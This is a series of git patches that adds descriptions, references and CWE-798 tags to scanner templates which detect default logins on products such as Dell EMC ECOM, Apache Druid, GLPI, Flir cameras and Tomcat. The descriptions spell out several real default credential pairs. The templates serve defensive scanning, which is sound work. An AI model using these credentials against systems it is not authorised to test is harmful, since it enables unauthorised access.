From 4df523df0e509c3d4bdbec80e7ebef1af0500516 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 11:38:05 -0500
Subject: [PATCH 001/259] Enhancement:
default-logins/dell/emcecom-default-login.yaml by mp
---
default-logins/dell/emcecom-default-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index c7d78156d9..902bf7d0af 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -4,9 +4,12 @@ info:
name: Dell EMC ECOM Default Login
author: Techryptic (@Tech)
severity: high
- description: Default Login of admin:#1Password on Dell EMC ECOM application.
+ description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
+ remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -35,4 +38,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/03
From e63283a88dcd3018b5b585d46eae8b38c65e5913 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 12:18:20 -0500
Subject: [PATCH 002/259] Enhancement:
default-logins/druid/druid-default-login.yaml by mp
---
default-logins/druid/druid-default-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index 78d252b867..f36476a73d 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -1,10 +1,13 @@
id: druid-default-login
info:
- name: Druid Default Login
+ name: Apache Druid Default Login
author: pikpikcu
severity: high
+ description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -36,4 +39,6 @@ requests:
- type: regex
regex:
- - "^success$"
\ No newline at end of file
+ - "^success$"
+
+# Enhanced by mp on 2022/03/03
From 6ccf56ab66eb4f59b8aaef3c7567cdff303e3cf1 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 12:36:18 -0500
Subject: [PATCH 003/259] Enhancement:
default-logins/dvwa/dvwa-default-login.yaml by mp
---
default-logins/dvwa/dvwa-default-login.yaml | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 941c2c30d0..fdae676c44 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -1,9 +1,15 @@
id: dvwa-default-login
+
info:
name: DVWA Default Login
author: pdteam
severity: critical
+ description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
tags: dvwa,default-login
+ reference:
+ - https://opensourcelibs.com/lib/dvwa
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -50,3 +56,5 @@ requests:
- type: word
words:
- "You have logged in as 'admin'"
+
+# Enhanced by mp on 2022/03/03
From a39e3081ad637bf7ff06fb36ed6167f0d2460500 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 12:45:16 -0500
Subject: [PATCH 004/259] Enhancement:
default-logins/exacqvision/exacqvision-default-login.yaml by mp
---
default-logins/exacqvision/exacqvision-default-login.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index e04d3a0f7f..49d90c9775 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@@ -4,8 +4,11 @@ info:
name: ExacqVision Default Login
author: ELSFA7110
severity: high
+ description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -41,3 +44,5 @@ requests:
words:
- '"auth":'
- '"success": true'
+
+# Enhanced by mp on 2022/03/03
From df44ab1b80769c467eaeaef31c4aa35c71a998ee Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:26:51 -0500
Subject: [PATCH 005/259] Enhancement:
default-logins/flir/flir-default-login.yaml by mp
---
default-logins/flir/flir-default-login.yaml | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 9cb112ad91..7b0077a878 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -4,7 +4,12 @@ info:
name: Flir Default Login
author: pikpikcu
severity: medium
+ description: Flir default login credentials (admin/admin) were discovered.
+ reference:
+ - https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
+ classificaiton:
+ cwe-id: 798
requests:
- raw:
@@ -41,3 +46,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/03
From 7174aed1915d1817c2fa7010a4c57e1df6b6bada Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:33:11 -0500
Subject: [PATCH 006/259] Enhancement:
default-logins/frps/frp-default-login.yaml by mp
---
default-logins/frps/frp-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml
index 2dc240d633..280c198e62 100644
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@@ -1,11 +1,14 @@
id: frp-default-login
info:
- name: Frp Default Login
+ name: FRP Default Login
author: pikpikcu
severity: high
+ description: FRP default login credentials were discovered.
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -33,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/03
From 367f1a7bc310adf7ff16fe605eba4f9677cc04d6 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:52:06 -0500
Subject: [PATCH 007/259] Enhancement:
default-logins/apache/tomcat-default-login.yaml by mp
---
default-logins/apache/tomcat-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index a9638ecc78..6269bc9a8b 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -1,8 +1,11 @@
id: tomcat-default-login
info:
- name: Tomcat Manager Default Login
+ name: ApahceTomcat Manager Default Login
author: pdteam
+ description: Apache Tomcat Manager default login credentials were discovered.
severity: high
+ reference:
+ - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
tags: tomcat,apache,default-login
requests:
@@ -64,3 +67,5 @@ requests:
- type: word
words:
- Apache Tomcat
+
+# Enhanced by mp on 2022/03/03
From 461497b437b7161590ff799ac8fa0cfb3a8d014f Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:55:38 -0500
Subject: [PATCH 008/259] Enhancement:
default-logins/azkaban/azkaban-default-login.yaml by mp
---
default-logins/azkaban/azkaban-default-login.yaml | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml
index 1970b6e737..1d8072f875 100644
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
- cwe-id: 255
+ cwe-id: 798
requests:
- raw:
@@ -50,6 +50,4 @@ requests:
kval:
- azkaban.browser.session.id
-# Enhanced by mp on 2022/03/02
-
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From 591d4e48a87c9a57e194ba7d96a568e99bda3980 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:58:08 -0500
Subject: [PATCH 009/259] Enhancement:
default-logins/cobbler/cobbler-default-login.yaml by mp
---
default-logins/cobbler/cobbler-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
index 65f9d50d26..26cf96c8c7 100644
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -3,7 +3,7 @@ id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
- description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
+ description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
@@ -69,4 +69,4 @@ requests:
regex:
- "(.*[a-zA-Z0-9].+==)"
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From cced84520e7a8e69d8139b5564091aeedeb1bfcc Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:05:45 -0500
Subject: [PATCH 010/259] Enhancement:
default-logins/gitlab/gitlab-weak-login.yaml by mp
---
default-logins/gitlab/gitlab-weak-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index e76419e893..47eeafcaf1 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -1,15 +1,18 @@
id: gitlab-weak-login
info:
- name: Gitlab Weak Login
+ name: Gitlab Default Login
author: Suman_Kar,dwisiswant0
severity: high
+ description: Gitlab default login credentials were discovered.
tags: gitlab,default-login
reference:
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
metadata:
shodan-query: http.title:"GitLab"
+ classificaiton:
+ cwe-id: 798
requests:
- raw:
@@ -50,4 +53,6 @@ requests:
- '"access_token":'
- '"token_type":'
- '"refresh_token":'
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/03
From 80de314765961dbca4724d95f8cfa1889ef56572 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:36:15 -0500
Subject: [PATCH 011/259] Enhancement:
default-logins/glpi/glpi-default-login.yaml by mp
---
default-logins/glpi/glpi-default-login.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml
index c2ea4c26d7..1871b41841 100644
--- a/default-logins/glpi/glpi-default-login.yaml
+++ b/default-logins/glpi/glpi-default-login.yaml
@@ -7,7 +7,8 @@ info:
tags: glpi,default-login
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
-
+ classification:
+ cwe-id: 798
requests:
- raw:
- |
@@ -65,3 +66,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/03
From 0f9b7c21994961c73332852e3554800ee94f9f95 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:37:05 -0500
Subject: [PATCH 012/259] Enhancement:
default-logins/flir/flir-default-login.yaml by mp
---
default-logins/flir/flir-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 7b0077a878..4a16184837 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
classificaiton:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From 9d8e6eb4670c990e1dfeea3451cf4a54af07b8b7 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:37:36 -0500
Subject: [PATCH 013/259] Enhancement:
default-logins/exacqvision/exacqvision-default-login.yaml by mp
---
default-logins/exacqvision/exacqvision-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index 49d90c9775..fa13193ef8 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@@ -8,7 +8,7 @@ info:
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From 680a70c6d78efd0106d8627e5a2f9eddf509dfa4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:38:03 -0500
Subject: [PATCH 014/259] Enhancement:
default-logins/dvwa/dvwa-default-login.yaml by mp
---
default-logins/dvwa/dvwa-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index fdae676c44..7e967df3d4 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://opensourcelibs.com/lib/dvwa
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From e1daf371929f4cb16b3594d16fb2670d4df9a9d4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:38:29 -0500
Subject: [PATCH 015/259] Enhancement:
default-logins/druid/druid-default-login.yaml by mp
---
default-logins/druid/druid-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index f36476a73d..afe3d891a4 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -7,7 +7,7 @@ info:
description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From a109daa435c337e0b4bec3812204a69fde8c1295 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:39:02 -0500
Subject: [PATCH 016/259] Enhancement:
default-logins/dell/emcecom-default-login.yaml by mp
---
default-logins/dell/emcecom-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index 902bf7d0af..2c72107657 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From b3b6ee59d305d9cbbc43e972a5c92444f7bf93d0 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:39:31 -0500
Subject: [PATCH 017/259] Enhancement:
default-logins/dell/dell-idrac9-default-login.yaml by mp
---
default-logins/dell/dell-idrac9-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml
index 2954ca38b1..e4c6acd8ec 100644
--- a/default-logins/dell/dell-idrac9-default-login.yaml
+++ b/default-logins/dell/dell-idrac9-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
tags: dell,idrac,default-login
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
@@ -39,4 +39,4 @@ requests:
words:
- '"authResult":0'
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From 957f02a47aa59725d6bace158263b364157e5f01 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:42:21 -0500
Subject: [PATCH 018/259] Enhancement:
default-logins/apache/tomcat-default-login.yaml by mp
---
default-logins/apache/tomcat-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index 6269bc9a8b..1f69e7a798 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -2,7 +2,7 @@ id: tomcat-default-login
info:
name: ApahceTomcat Manager Default Login
author: pdteam
- description: Apache Tomcat Manager default login credentials were discovered.
+ description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
severity: high
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
From 802e0e9b328cfdecffe29d53ced2c6e42f0f0432 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:43:16 -0500
Subject: [PATCH 019/259] Enhancement:
default-logins/azkaban/azkaban-default-login.yaml by mp
---
default-logins/azkaban/azkaban-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml
index 1d8072f875..828b52ef69 100644
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
From 4a56398ac36b15abb95e64ad031ade1ad52cfe5e Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:44:03 -0500
Subject: [PATCH 020/259] Enhancement:
default-logins/chinaunicom/chinaunicom-default-login.yaml by mp
---
default-logins/chinaunicom/chinaunicom-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml
index bfd586c991..264ffd5f07 100644
--- a/default-logins/chinaunicom/chinaunicom-default-login.yaml
+++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml
@@ -7,7 +7,7 @@ info:
description: Default login credentials were discovered for a China Unicom modem.
tags: chinaunicom,default-login
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
@@ -35,4 +35,4 @@ requests:
- "/menu.gch"
part: header
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From 03ce47eee05696082fa08e97419c39acb5c8b2c3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:44:33 -0500
Subject: [PATCH 021/259] Enhancement:
default-logins/cobbler/cobbler-default-login.yaml by mp
---
default-logins/cobbler/cobbler-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
index 26cf96c8c7..7a291fcf40 100644
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -11,7 +11,7 @@ info:
severity: high
tags: cobbler,default-login,api
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 352f8ae75d68f4bf720a1e4543c1fe92d06f3518 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:44:56 -0500
Subject: [PATCH 022/259] Enhancement:
default-logins/dell/dell-idrac-default-login.yaml by mp
---
default-logins/dell/dell-idrac-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml
index 0ae492af80..b0f88ff1cd 100644
--- a/default-logins/dell/dell-idrac-default-login.yaml
+++ b/default-logins/dell/dell-idrac-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
tags: dell,idrac,default-login
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
@@ -41,4 +41,4 @@ requests:
words:
- '0'
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From c41b77e6a7cc39a44d17ecf469df1eff1c75a016 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:45:13 -0500
Subject: [PATCH 023/259] Enhancement:
default-logins/dell/emcecom-default-login.yaml by mp
---
default-logins/dell/emcecom-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index 2c72107657..702fcf9b62 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 77bcfd56f9007cc8a04fece4fcdf4f5316f56f5b Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:45:32 -0500
Subject: [PATCH 024/259] Enhancement:
default-logins/druid/druid-default-login.yaml by mp
---
default-logins/druid/druid-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index afe3d891a4..4dd778392e 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -7,7 +7,7 @@ info:
description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From f6f0982b9ef02d17e59a6609a7a40c8f33b26c3c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:46:01 -0500
Subject: [PATCH 025/259] Enhancement:
default-logins/dvwa/dvwa-default-login.yaml by mp
---
default-logins/dvwa/dvwa-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 7e967df3d4..4ade6498f5 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://opensourcelibs.com/lib/dvwa
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 64c31b5dc99814de2b0fed64c0236d6f7c56dff4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:46:18 -0500
Subject: [PATCH 026/259] Enhancement:
default-logins/flir/flir-default-login.yaml by mp
---
default-logins/flir/flir-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 4a16184837..74645c8686 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
classificaiton:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 070a65f4b666639edcdf94fdd1e41bbe74e2c97f Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:48:03 -0500
Subject: [PATCH 027/259] Enhancement:
default-logins/frps/frp-default-login.yaml by mp
---
default-logins/frps/frp-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml
index 280c198e62..86875c9a39 100644
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@@ -8,7 +8,7 @@ info:
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
From 24c85358ae9dca0fa8be7e66cd9683b125821cbd Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:48:31 -0500
Subject: [PATCH 028/259] Enhancement:
default-logins/gitlab/gitlab-weak-login.yaml by mp
---
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 47eeafcaf1..199f3f00ae 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -12,7 +12,7 @@ info:
metadata:
shodan-query: http.title:"GitLab"
classificaiton:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
From f149aeeafd250189ca40b3db3adaf84775b2d9d9 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:49:20 -0500
Subject: [PATCH 029/259] Enhancement:
default-logins/glpi/glpi-default-login.yaml by mp
---
default-logins/glpi/glpi-default-login.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml
index 1871b41841..26612339e6 100644
--- a/default-logins/glpi/glpi-default-login.yaml
+++ b/default-logins/glpi/glpi-default-login.yaml
@@ -5,10 +5,11 @@ info:
author: andysvints
severity: high
tags: glpi,default-login
- description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
+ description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
classification:
- cwe-id: 798
+ cwe-id: CWE-798
